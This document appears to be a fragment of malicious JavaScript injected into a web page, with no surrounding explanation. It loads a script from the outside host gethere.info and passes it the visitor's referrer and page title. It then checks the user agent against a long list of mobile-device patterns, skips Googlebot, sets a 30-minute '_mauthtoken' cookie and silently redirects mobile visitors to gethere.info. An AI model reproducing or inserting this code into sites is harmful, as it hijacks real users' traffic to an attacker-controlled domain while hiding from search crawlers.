s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}